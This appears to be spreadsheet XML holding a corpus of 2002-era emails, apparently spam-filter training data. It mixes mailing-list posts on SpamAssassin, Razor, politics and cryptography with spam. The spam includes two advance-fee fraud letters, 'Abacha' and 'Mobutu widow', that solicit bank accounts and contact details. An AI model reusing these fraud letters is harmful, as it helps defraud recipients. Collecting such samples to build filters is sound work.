 name into the remove box. If you have previously 
 unsubscribed and are still receiving this message, you may email our 
 &lt;a href=3D"mailto:nospamws@yahoo.com?Subject=3DAbuse Report"&gt;Abuse Control=
  Center&lt;/a&gt;, 
 or call 1-888-763-2497, or write us at: NoSpam, 6484 Coral Way, 
 Miami, FL, 33155".&lt;/FONT&gt;&lt;br&gt; 
 &lt;BR&gt; 
 &lt;IMG SRC=3Dhttp://365.sunshinehui.com/creditfix/email/line.gif&gt;&lt;BR&gt; 
 &lt;FONT FACE=3DVerdana SIZE=3D1&gt;&amp;copy; 2002 Web Credit Inc. All Rights Reser=
 ved&lt;/FONT&gt;&lt;FONT FACE=3D"Verdana" SIZE=3D"1"&gt;.&lt;/FONT&gt;&lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/TD&gt; 
 &lt;/TR&gt; 
 &lt;/TABLE&gt; 
 &lt;/CENTER&gt; 
 &lt;BR&gt; 
 &lt;/BODY&gt; 
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: urgent and confidential business proposal
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --=====================_889472414==_
 Content-Type: text/plain
 Content-Transfer-Encoding: 8bit
 Your Attention, Please
 PLEASE REPLY ONLY TO:
 (1)  abacha10@africamail.net
 (2)  abacha10@mail2africa.com  
 (3)  alhajiabubakar10@email.com
 I  have very confidential and urgent business to
 transact with you. But first permit me to say that I
 do not know you; you are receiving this mail via blind
 carbon copy of email addresses which I obtained from a
 simple internet search. You are therefore NOT obliged
 to reply. However, if you do, and the conditions are
 right, you will be amply compensated. It is also
 pertinent to add that I am using an assumed name, and
 free web based email addresses for my personal
 protection .
 In order to give you a background of this "business
 transaction", please check the website  
 http://news.ft.com/ft/gx.cgi/ftc?pagename=View&amp;c=Article&amp;cid=FT3PQPP45QC
 Before proceeding further, please permit me to give
 you more background on the Abacha family "MILLIONS" as
 it is now known; please check the following websites
 http://www.oneworld.org/ips2/aug98/17_29_059.html
 http://www.odiousdebts.org/odiousdebts/index.cfm?DSP=content&amp;ContentID=974
 I have taken some pains to give you readings on the
 Abacha Family fortunes; They are of  course a matter
 of public record, and CONCLUSIVELY PROVES INDEED THAT
 GENERAL SANI ABACHA TRANSFERRED BILLIONS OF DOLLARS
 OUT OF NIGERIA ! However, it is conceivable and even
 logical that NOT ALL OF THE FORTUNE HAS BEEN
 "DISCOVERED" OR FROZEN BY FOREIGN GOVERNMENTS IN
 SYMPATHY AND ON THE REQUEST OF THE CURRENT GOVERNMENT
 OF NIGERIA. AND THIS IS A FACT!
 The truth of the matter is that much more of the
 Abacha fortunes are still hidden , their location a
 closely guarded secret; Her Excellency, Hajia
 Abacha,widow of Gen. Sani Abacha, ex-head of
 State of Nigeria, who died June 8, 1998
 and her immediate family are under house arrest in
 Nigeria. It is therefore my job to search out a
 reliable person, a complete stranger to help
 transfer/secure a negotiated amount from the still
 hidden millions of Dollars.  The right person must
 pass a background check in order to avoid my being
 betrayed to the AUTHORITIES, as happened in the past.
 It is now obvious why I will be using an assumed name
 for the moment. All precautions will be taken to avoid
 leakages. Though I am using the internet which is
 largely unsafe, as soon as I get a "reliable"
 candidate, I will introduce security measures for
 every body's protection. For the moment I am simply a
 "Contact Person" for the REAL Abacha family.
 In sum, the person I am looking for is an individual
 or corporate body that is able to provide one or more
 Bank Accounts into which arrangements will be made to
 transfer US$5,000,000.00 to US$10,000,000.00 every
 week; The routine, periodic transfers in small
 instalments are designed to avoid raising suspicion in
 the wrong quarters. These transfers will be secure and
 properly legal, and with all proper bank
 documentation. The right person may need to establish 
 fresh/new RECEIVING BANK accounts free from legal or
 financial encumbrances. Persons with bad credit rating
 , undischarged bankrupts, companies in receivership
 and minors need not reply; Because of the stature and
 confidentiality of this proposed transaction, a
 successful candidate will receive 25% of all
 transfers. Other Conditions, including maximum secrecy
 and confidentiality  apply. 
 If you are interested in helping this family, and if
 you can meet our strict conditions, please reply to
 all email addresses listed below. In your reply please
 include your phone, fax and contact address. In the
 event you do not meet our conditions after a brief
 back ground check, you will be communicated
 accordingly. Please before replying,  take your time
 to go through all the links and investigate thoroughly
 all the foregoing; this is a serious proposal, despite
 the medium in which you are receiving my message.
 Looking forward to your reply,
 Yours Sincerely,
 Alhaji Abubakar
 Please  Reply to:
 (1)  abacha10@africamail.net
 (2)  abacha10@mail2africa.com  
 (3)  alhajiabubakar10@email.com
 --=====================_889472414==_
 Content-Type: text/html
 Content-Transfer-Encoding: 8bit
 &lt;html&gt;
 &lt;body&gt;
 &lt;div align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Your Attention, Please
 &lt;br /&gt;
 &lt;br /&gt;
 PLEASE REPLY ONLY TO:
 &lt;br /&gt;
 &lt;br /&gt;
 (1)  abacha10@africamail.net
 &lt;br /&gt;
 (2)  abacha10@mail2africa.com  
 &lt;br /&gt;
 (3)  alhajiabubakar10@email.com
 &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 I  have very confidential and urgent business to
 &lt;br /&gt;
 transact with you. But first permit me to say that I
 &lt;br /&gt;
 do not know you; you are receiving this mail via blind
 &lt;br /&gt;
 carbon copy of email addresses which I obtained from a
 &lt;br /&gt;
 simple internet search. You are therefore NOT obliged
 &lt;br /&gt;
 to reply. However, if you do, and the conditions are
 &lt;br /&gt;
 right, you will be amply compensated. It is also
 &lt;br /&gt;
 pertinent to add that I am using an assumed name, and
 &lt;br /&gt;
 free web based email addresses for my personal
 &lt;br /&gt;
 protection .
 &lt;br /&gt;
 &lt;br /&gt;
 In order to give you a background of this "business
 &lt;br /&gt;
 transaction", please check the website  
 &lt;br /&gt;
 &lt;br /&gt;
 http://news.ft.com/ft/gx.cgi/ftc?pagename=View&amp;c=Article&amp;cid=FT3PQPP45QC
 &lt;br /&gt;
 &lt;br /&gt;
 Before proceeding further, please permit me to give
 &lt;br /&gt;
 you more background on the Abacha family "MILLIONS" as
 &lt;br /&gt;
 it is now known; please check the following websites
 &lt;br /&gt;
 &lt;br /&gt;
 http://www.oneworld.org/ips2/aug98/17_29_059.html
 &lt;br /&gt;
 &lt;br /&gt;
 http://www.odiousdebts.org/odiousdebts/index.cfm?DSP=content&amp;ContentID=974
 &lt;br /&gt;
 &lt;br /&gt;
 I have taken some pains to give you readings on the
 &lt;br /&gt;
 Abacha Family fortunes; They are of  course a matter
 &lt;br /&gt;
 of public record, and CONCLUSIVELY PROVES INDEED THAT
 &lt;br /&gt;
 GENERAL SANI ABACHA TRANSFERRED BILLIONS OF DOLLARS
 &lt;br /&gt;
 OUT OF NIGERIA ! However, it is conceivable and even
 &lt;br /&gt;
 logical that NOT ALL OF THE FORTUNE HAS BEEN
 &lt;br /&gt;
 "DISCOVERED" OR FROZEN BY FOREIGN GOVERNMENTS IN
 &lt;br /&gt;
 SYMPATHY AND ON THE REQUEST OF THE CURRENT GOVERNMENT
 &lt;br /&gt;
 OF NIGERIA. AND THIS IS A FACT!
 &lt;br /&gt;
 &lt;br /&gt;
 The truth of the matter is that much more of the
 &lt;br /&gt;
 Abacha fortunes are still hidden , their location a
 &lt;br /&gt;
 closely guarded secret; Her Excellency, Hajia
 &lt;br /&gt;
 Abacha,widow of Gen. Sani Abacha, ex-head of
 &lt;br /&gt;
 State of Nigeria, who died June 8, 1998
 &lt;br /&gt;
 and her immediate family are under house arrest in
 &lt;br /&gt;
 Nigeria. It is therefore my job to search out a
 &lt;br /&gt;
 reliable person, a complete stranger to help
 &lt;br /&gt;
 transfer/secure a negotiated amount from the still
 &lt;br /&gt;
 hidden millions of Dollars.  The right person must
 &lt;br /&gt;
 pass a background check in order to avoid my being
 &lt;br /&gt;
 betrayed to the AUTHORITIES, as happened in the past.
 &lt;br /&gt;
 It is now obvious why I will be using an assumed name
 &lt;br /&gt;
 for the moment. All precautions will be taken to avoid
 &lt;br /&gt;
 leakages. Though I am using the internet which is
 &lt;br /&gt;
 largely unsafe, as soon as I get a "reliable"
 &lt;br /&gt;
 candidate, I will introduce security measures for
 &lt;br /&gt;
 every body's protection. For the moment I am simply a
 &lt;br /&gt;
 "Contact Person" for the REAL Abacha family.
 &lt;br /&gt;
 &lt;br /&gt;
 In sum, the person I am looking for is an individual
 &lt;br /&gt;
 or corporate body that is able to provide one or more
 &lt;br /&gt;
 Bank Accounts into which arrangements will be made to
 &lt;br /&gt;
 transfer US$5,000,000.00 to US$10,000,000.00 every
 &lt;br /&gt;
 week; The routine, periodic transfers in small
 &lt;br /&gt;
 instalments are designed to avoid raising suspicion in
 &lt;br /&gt;
 the wrong quarters. These transfers will be secure and
 &lt;br /&gt;
 properly legal, and with all proper bank
 &lt;br /&gt;
 documentation. The right person may need to establish 
 &lt;br /&gt;
 fresh/new RECEIVING BANK accounts free from legal or
 &lt;br /&gt;
 financial encumbrances. Persons with bad credit rating
 &lt;br /&gt;
 , undischarged bankrupts, companies in receivership
 &lt;br /&gt;
 and minors need not reply; Because of the stature and
 &lt;br /&gt;
 confidentiality of this proposed transaction, a
 &lt;br /&gt;
 successful candidate will receive 25% of all
 &lt;br /&gt;
 transfers. Other Conditions, including maximum secrecy
 &lt;br /&gt;
 and confidentiality  apply. 
 &lt;br /&gt;
 &lt;br /&gt;
 If you are interested in helping this family, and if
 &lt;br /&gt;
 you can meet our strict conditions, please reply to
 &lt;br /&gt;
 all email addresses listed below. In your reply please
 &lt;br /&gt;
 include your phone, fax and contact address. In the
 &lt;br /&gt;
 event you do not meet our conditions after a brief
 &lt;br /&gt;
 back ground check, you will be communicated
 &lt;br /&gt;
 accordingly. Please before replying,  take your time
 &lt;br /&gt;
 to go through all the links and investigate thoroughly
 &lt;br /&gt;
 all the foregoing; this is a serious proposal, despite
 &lt;br /&gt;
 the medium in which you are receiving my message.
 &lt;br /&gt;
 &lt;br /&gt;
 Looking forward to your reply,
 &lt;br /&gt;
 &lt;br /&gt;
 Yours Sincerely,
 &lt;br /&gt;
 &lt;br /&gt;
 Alhaji Abubakar
 &lt;br /&gt;
 &lt;br /&gt;
 Please  Reply to:
 &lt;br /&gt;
 (1)  abacha10@africamail.net
 &lt;br /&gt;
 (2)  abacha10@mail2africa.com  
 &lt;br /&gt;
 (3)  alhajiabubakar10@email.com
 &lt;br /&gt;
 &lt;br /&gt;
 &lt;/font&gt;&lt;/div&gt;&lt;/body&gt;&lt;/html&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 --=====================_889472414==_--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [meta-forkage]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 In a message dated 9/19/2002 3:45:45 PM, dl@silcom.com writes:
 &gt;I don't mind if people advocate nuking
 &gt;gay baby whales for jesus, if they can
 &gt;make a good, original, argument for it.
 I can't imagine any other kind of argument for nuking gay baby whales for 
 jesus. But do you mean nuking baby gay whales who are for jesus; or nuking 
 baby gay whales for Jesus's sake?
 splitting hairs with a FoRK,
 Tom
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] Party in San Francisco tonight
</t>
  </si>
  <si>
    <t xml:space="preserve">I don't know how make of you are in the Bay Area but EFF is having a benifit 
 party ast the DNA Lounge in San Francisco tonight. Wil Weaton (Wesley Crussher 
 from star Trek TNG) will fight Barney the Dinasour.
 Come on by if you're not doing anything.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</si>
  <si>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Re: [Razor-users] removing Razor1
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --iJXiJc/TAIT2rh2r
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 On Thu, Sep 05, 2002 at 05:11:32PM -0500, Josh Hildebrand wrote:
 &gt; If that's the case, can someone please point me to something that explains
 &gt; how to remove Razor1 from my system?  I don't see a point in envoking it.
 &gt; Especially when it appears to error out on me.
 &gt;=20
 &gt; Problem while trying to load Razor1: Permission denied  at
 &gt; /usr/local/lib/perl5/site_perl/5.6.1/Mail/SpamAssassin/Dns.pm line 288.
 &gt; debug: leaving helper-app run mode
 rm -rf /usr/local/lib/perl5/site_perl/5.6.1/Razor
 (you'll want to check that path first of course...)
 --=20
 Randomly Generated Tagline:
 "It's a chicken finger device."            - Theo, looking at entree
 --iJXiJc/TAIT2rh2r
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.6 (GNU/Linux)
 Comment: For info see http://www.gnupg.org
 iD8DBQE9d/wdAuOQUeWAs2MRAsXtAJ9ZJezMTsUuIw/Q3MMkZ6/QAyuYGgCgtc3/
 iUYXa6+6icdddeWovza09lk=
 =46WZ
 -----END PGP SIGNATURE-----
 --iJXiJc/TAIT2rh2r--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</si>
  <si>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Limited Time Offer For A FREE Membership!
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (YourPeach21@hotmail.com) on Wednesday, July 24, 2002 at 06:30:19
 ---------------------------------------------------------------------------
 :: For a limited time you can get a 100% FREE membership to the best sites on the internet. No telling how long this limited time offer will last &lt;a href="http://rd.yahoo.com/dir/?http://members.lycos.co.uk/yourselected/winner.htm"&gt;Act Fast!&lt;/a&gt;If You Would Like To Be Removed Then &lt;a href="mailto:remove_me123@hotmail.com"&gt;remove&lt;/a&gt;
 ---------------------------------------------------------------------------
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Buy the Enron "E"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85486452
 Date: Not supplied
 Gregor sez: 
     ENRON Corp material assets go on the block 7 AM CT TOMORROW, Wednesday, 
     9/25. First on the list is the giant, steel, Enron "E" (Lot "E"), followed 
     by tons of cool tech. 50 inch plasma panels, desktop LC Displays, boxes of 
     Palm PDAs or Nokia cell phones, network stuff, wireless stuff, desktop 
     computers, servers, monitors, printers, plotters, in both massive lots, and 
     individually! Oh yeah, Enron trade-show trinkets too, by the cartload. 
     The catch: You have to either go to Texas to pick up the stuff, or arrange 
     with an approved 3rd party vendor (list provided on the web site) to have 
     it picked, packed and shipped for you. 
     Go! Register! Bid! Consume!  
 Link[1] Discuss[2] (_Thanks, Gregor!_)
 [1] http://www.dovebid.com/Auctions/auction1480/catalog/browsewebcast_1480_50_1.html
 [2] http://www.quicktopic.com/boing/H/K95wm7U4E85
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: YOUR a STUPID Idj0t
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.askbjoernhansen.com/archives/2002/09/20.html
 Date: 2002-09-20T16:13:37-08:00
 Jeremy writes about people who ignore basic language rules I entirely agree 
 with him. Writing "how r u 2day." is the best way to make me shift my attention 
 and respect away from you really fast. Another pet peeve: I have only been 
 speaking English on a regular basis for a bit more than three years, and even I 
 can grok the difference between "you are" and "your". As mjd wrote on clpm and 
 said in the YAPC movie: "You...
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 2002-07-26 at 12:49, Ian Andrew Bell wrote:
 &gt; This isn't particularly well-founded logic.  What you're saying is 
 &gt; that "most rich people are smart" and that the latter is causal to 
 &gt; the former.  By implication, then, you would say that "most poor 
 &gt; people are stupid".  This is true, statistically, because most 
 &gt; people are poor and most people are also stupid.  
 I never said that rich people are smart, just less stupid than most
 other people.  And most people who are poor do engage in more reckless
 and stupid behavior in my experience; the people that are a bit smarter
 don't stay poor for long, so it is a self-selecting population.  Hell, I
 grew up in as abject a poverty as you can find in the US and I remember
 quite well why the people that stayed poor were poor -- it certainly
 wasn't because of The Man.  And my parents were poor because they made
 lots of stupid choices -- I had front row seats to the whole process. 
 Unlike many others, I actually learned from the experience.
 And I've known a lot of wealthy people (both in a strict monetary sense
 and general sense), and I can't think of a one that was a fool. People
 who earned their wealth (i.e. 95+% of the wealthy in the US) didn't
 manage to do so, and maintain their wealth, because they were fools.  It
 isn't that these people are that much smarter, they just don't make lots
 of bad decisions and stupid mistakes. Being very smart AND not making
 lots of stupid mistakes is pretty much a surefire recipe for being
 wealthy.
 &gt; Being smart, for example, has made Stephen Hawking famous and 
 &gt; respected, but he's not particularly rich.  Jennifer Lopez is by 
 &gt; all accounts a complete moron.  In fact, spend a weekend in Beverly 
 &gt; Hills and you will encounter vast numbers of people who are 
 &gt; profoundly stupid driving Rolls Royces and shopping at PRADA.
 You are using a very narrow definition of "smart".  Smart doesn't make
 you rich, it gives you the *choice* to be rich. Many people (e.g.
 Stephen Hawking) are quite happy merely being comfortable and devote
 their energy elsewhere than being "rich".  But I don't know too many
 really smart people that actually choose to live in poverty.
 &gt; [...ridiculous caricature of wealthy people elided...]
 &gt; At the granular level, the notion that "most rich people are rich 
 &gt; because they're smart" is so anecdotal and naive that it's not 
 &gt; worth arguing about, so I won't.  Still, a compelling point worth 
 &gt; some clarification.
 It sounds like you've bought into the absurd Hollywood depictions of
 what wealthy people are like.  Hint: they are exactly like you and me,
 but with a higher net worth.  In the U.S., the fact is that two-thirds
 of the millionaires are blue collar folks who worked very smart and very
 hard, and the vast majority of all the wealthy in the U.S. are
 completely self-made (i.e. first-generation wealthy).  "Old wealth" is
 incredibly rare in the U.S., as it typically comes and goes within three
 generations, and the handful that you do hear about are the unusually
 long-lived exceptions.
 It's quite simple to become wealthy in the U.S. if you put some effort
 into it.  However, most people prefer to merely be comfortable and
 expend a lot less energy.  Virtually all the people I know who are
 wealthy are chronic workaholics with above average intelligence and
 exaggerated amounts of drive.  Most people would not consider those
 people's lives "fun", though those people tend to enjoy what they do.
 -James Rogers
  jamesr@best.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">DEAR FRIEND,I AM MRS.  SESE-SEKO WIDOW OF LATE PRESIDENT MOBUTU
 SESE-SEKO OF ZAIRE? NOW KNOWN AS DEMOCRATIC REPUBLIC
 OF CONGO (DRC).  I AM MOVED TO WRITE YOU THIS LETTER,
 THIS WAS IN CONFIDENCE  CONSIDERING MY PRESENTCIRCUMSTANCE AND SITUATION.
 I ESCAPED ALONG WITH MY HUSBAND AND TWO OF OUR SONS
 GEORGE  KONGOLO  AND BASHER  OUT OF DEMOCRATIC REPUBLIC OF
 CONGO (DRC) TO ABIDJAN, COTE D'IVOIRE WHERE MY FAMILY
 AND I SETTLED, WHILE WE LATER MOVED  TO SETTLED IN
 MORROCO WHERE MY HUSBAND LATER DIED OF CANCER
 DISEASE. HOWEVER DUE TO THIS SITUATION WE DECIDED TO
 CHANGED  MOST OF MY HUSBAND'S BILLIONS OF DOLLARS
 DEPOSITED IN SWISS BANK AND OTHER COUNTRIES INTO OTHER
 FORMS OF MONEY CODED FOR  SAFE PURPOSE BECAUSE THE NEW
 HEAD OF STATE OF (DR) MR LAURENT  KABILA HAS MADE
 ARRANGEMENT WITH THE SWISS GOVERNMENT AND OTHER
 EUROPEAN COUNTRIES TO FREEZE ALL MY LATE HUSBAND'S
 TREASURES  DEPOSITED IN SOME EUROPEAN COUNTRIES. HENCE
 MY CHILDREN AND I DECIDED LAYING LOW IN AFRICA TO
 STUDY THE SITUATION TILL  WHEN THINGS GETS BETTER,
 LIKE NOW THAT PRESIDENT KABILA IS DEAD AND THE SON
 TAKING OVER (JOSEPH KABILA). ONE OF MY LATE HUSBAND'S
 CHATEAUX IN SOUTHERN FRANCE WAS CONFISCATED  BY THE
 FRENCH GOVERNMENT, AND AS SUCH I HAD TO CHANGE MY
 IDENTITY  SO THAT MY INVESTMENT WILL NOT BE TRACED AND
 CONFISCATED. I HAVE DEPOSITED THE SUM EIGHTEEN MILLION
 UNITED STATE DOLLARS(US$18,000,000,00.)  WITH A
 SECURITY COMPANY , FOR SAFEKEEPING. THE  FUNDS ARE
 SECURITY CODED TO PREVENT THEM FROM
 KNOWING THE CONTENT. WHAT I WANT YOU TO DO IS TO
 INDICATE YOUR INTEREST THAT YOU WILL ASSIST US BY RECEIVING THE MONEY ON OUR
 BEHALF.ACKNOWLEDGE THIS MESSAGE, SO THAT I CAN INTRODUCE YOU TO MY SON
 (KONGOLO) WHO HAS THE OUT MODALITIES FOR THE CLAIM OF THE SAID FUNDS. I
 WANT YOU TO ASSIST IN INVESTING THIS MONEY, BUT I WILL NOT WANT MY IDENTITY
 REVEALED. I WILL ALSO WANT TO BUY PROPERTIES AND STOCK IN MULTI-NATIONAL
 COMPANIES AND TO ENGAGE IN OTHER SAFE AND
 NON-SPECULATIVE INVESTMENTS. MAY I AT THIS POINT
 EMPHASISE THE HIGH LEVEL OF CONFIDENTIALITY,  WHICH
 THIS BUSINESS DEMANDS, AND HOPE YOU WILL NOT BETRAY
 THE TRUST AND CONFIDENCE, WHICH I REPOSE IN YOU. IN
 CONCLUSION,  IF YOU WANT TO ASSIST US , MY SON SHALL
 PUT YOU IN THE PICTURE  OF THE BUSINESS, TELL YOU
 WHERE THE FUNDS ARE CURRENTLY BEING  MAINTAINED AND
 ALSO DISCUSS OTHER MODALITIES INCLUDING REMUNERATIONFOR YOUR SERVICES.
 FOR THIS REASON KINDLY FURNISH US YOUR CONTACT
 INFORMATION, THAT IS YOUR PERSONAL TELEPHONE AND FAX
 NUMBER FOR CONFIDENTIAL PURPOSE.BEST REGARDS,MRS M. SESE SEKO
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Norton Systemworks 2002 Final Clearance            1093
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;p align=3D"center"&gt;&lt;br&gt;
 &lt;b&gt;&lt;font size=3D"6" face=3D"Tahoma" color=3D"#000080"&gt;
 Norton SystemWorks 2002&lt;br&gt;Software Suite&lt;br&gt;
 Professional Edition&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;/b&gt;&lt;font face=3D"Arial"&gt;&lt;b&gt;&lt;font size=3D"5"&gt;&lt;font color=3D"#FF0000"&gt;
 6 Feature-Packed Utilities,&lt;/font&gt; 1 Great Price&lt;/font&gt;&lt;br&gt;
 &lt;font size=3D"4"&gt;A $300.00+ Combined Retail Value for &lt;font color=3D"#FF00=
 00"&gt; Only $29.99!&lt;/font&gt;&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"3"&gt;&lt;span style=3D"background-color: #FFFF00"&gt;
 Protect your computer and your valuable information!&lt;br&gt;&lt;br&gt;
 Don't allow yourself to fall prey to destructive viruses!&lt;/span&gt;&lt;br&gt;&lt;br&gt;
 &lt;a href=3D"http://www.1800mailman.com/software/sw.htm"&gt;CLICK HERE FOR MORE=
  INFO AND TO ORDER&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;&lt;br&gt;
 &lt;font size=3D"2"&gt;If you wish to unsubscribe from this list, please &lt;a href=
 =3D"http://www.1800mailman.com/removeme.html"&gt; Click Here&lt;/a&gt; to be remove=
 d.&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: 8 Free Movie Tickets for doing a 2 Minute survey! Any Movie, Any Theater!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;head&gt;
 &lt;title&gt;8 FREE Movie Tickets&lt;/title&gt;&lt;/head&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;table width="600" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;&lt;td bgcolor="#FFFFFF"&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=CPIUFTGUCUBA&amp;ext=1"&gt;&lt;IMG src="http://www.surveytheglobe.com/images/title.gif" height="99" width="600" border="0" alt=""&gt;&lt;/A&gt;&lt;/td&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=CPIUFTGUCUBA&amp;ext=1"&gt;&lt;IMG src="http://www.surveytheglobe.com/images/blue.gif" width="600" height="117" border="0" alt=""&gt;&lt;/A&gt;&lt;/td&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=CPIUFTGUCUBA&amp;ext=1"&gt;&lt;IMG src="http://www.surveytheglobe.com/images/button.gif" width="600" height="110" border="0" alt=""&gt;&lt;/A&gt;&lt;/td&gt;&lt;/TR&gt;
 &lt;TR&gt;&lt;td&gt;&lt;a href="http://theadmanager.com/server/c.asp?ad_key=CPIUFTGUCUBA&amp;ext=1"&gt;&lt;IMG src="http://www.surveytheglobe.com/images/bottom.gif" width="600" height="75" border="0" alt=""&gt;&lt;/A&gt;&lt;/td&gt;&lt;/TR&gt;
 &lt;/TBODY&gt;
 &lt;/TABLE&gt;
 &lt;BR&gt;
 &lt;img src="http://admanmail.com/server/t.asp?ad_key=CPIUFTGUCUBA"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</si>
  <si>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[SAdev] [Bug 813] add Bayesian spam filtering
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=813
 ------- Additional Comments From jm@jmason.org  2002-09-21 16:39 -------
 Dan, BTW, is there any code from this that we can get checked in?
 I'd love to mess around with it a bit.
 ------- You are receiving this mail because: -------
 You are on the CC list for the bug, or are watching someone who is.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</si>
  <si>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&gt; Check it into the spambayes project.  SF's disks are cheap &lt;wink&gt;.
 Perhaps more useful would be if Tim could check in the pickle(s?)
 generated by one of his training runs, so that others can see how
 Tim's training data performs against their own corpora.  This could
 also be the starting point for a self-contained distribution (you've
 got to start with *something*, and training with python-list data
 seems just as good as anything else).
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Goodbye Global Warming
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Gary Lawrence Murphy wrote:
 &gt; &gt;and say hello to the cool:  Oooo ... /this/ is going to cause
 &gt; some stir ...
 &gt;
 &gt; Of course not.  Some people just don't want to be confused by the facts.
 For anyone to fully bury global warming, they would need to explain why the
 dramatic increase in CO2 concentrations are not increasing the global
 temperature. They would also need to explain why, worldwide, glaciers are
 melting faster than they have previously in the historical record. That is,
 people need more than refutations, they need a compelling alternate
 explanation (hint: climate variability doesn't cover all the bases).
 - Jim
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Liberalism in America
</t>
  </si>
  <si>
    <t xml:space="preserve">
 In essence, hindsight justification.  The progressives weren't in the
 middle, they were in a society at one end and they wanted a society at
 the other end.  The middle is more or less where they got stopped.
 As to an intervention that worked, I actually have some nice things to
 say about the SEC, at least in theory.  I have a few nasty things to say
 as well, but on the whole it has been a very good thing.
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Geege
 &gt; Schuman
 &gt; Sent: Tuesday, September 24, 2002 6:37 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Liberalism in America
 &gt; 
 &gt; liberalism
 &gt; propagandized as meddling
 &gt; in truth, the middle
 &gt; 
 &gt; "American liberalism believes that in this respect it has made a major
 &gt; contribution to the grand strategy of freedom. Where both capitalists
 and
 &gt; socialists in the 1930's were trying to narrow the choice to either/or
 --
 &gt; either laissez-faire capitalism or bureaucratic socialism -- the New
 Deal
 &gt; persisted in its vigorous faith that human intelligence and social
 &gt; experiment could work out a stable foundation for freedom in a context
 of
 &gt; security and for security in a context of freedom. That faith remains
 the
 &gt; best hope of free society today."
 &gt; 
 &gt; fluid yet crunchy,
 &gt; gg
 &gt; 
 &gt; 
 &gt; 
 &gt; 
 &gt;  http://www.english.upenn.edu/~afilreis/50s/schleslib.html
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 11 Aug 2002, Russell Turpin wrote:
 &gt; If you're using the mail client on your personal
 &gt; machine, there's no reason you would need to enter
 &gt; a passphrase, unless that is part of how you secure
 &gt; the data on your personal machine. You're private
 The original comment's context was digital signatures. A digital signature
 is worth sqrat if any userspace app or rogue superuser code can grab your
 keyring in clear, and send out stuff in your name. A passphrase unlocking
 the keyring for that particular use is a minimal protection (since not
 immune to passphrase snarfers), but this is much, much better than always
 leaving your key in the lock. (Why then having at all the key, in the
 first place?)
 &gt; key is as secure as any other data on your machine.
 &gt; If you're working remotely, you already have to
 &gt; enter a passphrase to get to your email.
 A passphrase is a (long, secure) password unlocking (decrypting) your 
 keyring. You don't use a passphrase to read your email. Unless it resides 
 on a crypto file system.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Bits from the job front...
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; * FoRK is now almost all spam, somebody fix the damn subscriber-only-posting
 &gt; setting already, dont make me show up at your house Rohit ;)
 Upon a similar (albeit slightly friendlier :-) threat to Rohit et. al.,
 I have received a promise that things will be fixed Real Soon Now.
 Which is good because I don't want to have to piss off Kragen :-)
 - Joe
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] Newby to Linux looking for information on cvs
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello all,
 Firstly I'd like to thank all of you for the fast and very helpful feedback
 that I got to my question today.  I have one more question though.  I
 downloaded the w3 and url files from the server at the first try thanks to
 the help that I received today.  Then though I tried to build them.  I
 started by trying the w3 program.  I used the following lines which produced
 some strange results.  Would any one be able to set me straight?
 ./configure --with-emacs --prefix=/usr/local/src/beta/w3 --exec-prefix=/usr/
 local/src/beta/w3 --with-url=/url/url
 That worked fine so I moved to the next step.
 make
 At the bottem of the text I got the following messages:
 Cannot open load file: /url/url/url-vars.el
 make[1]: *** [custom-load.el] Error 255
 make[1]: Leaving directory `/usr/local/src/beta/w3/lisp'
 make: *** [w3] Error 2
 When I got around to trying the url package I had no problems.  In saying
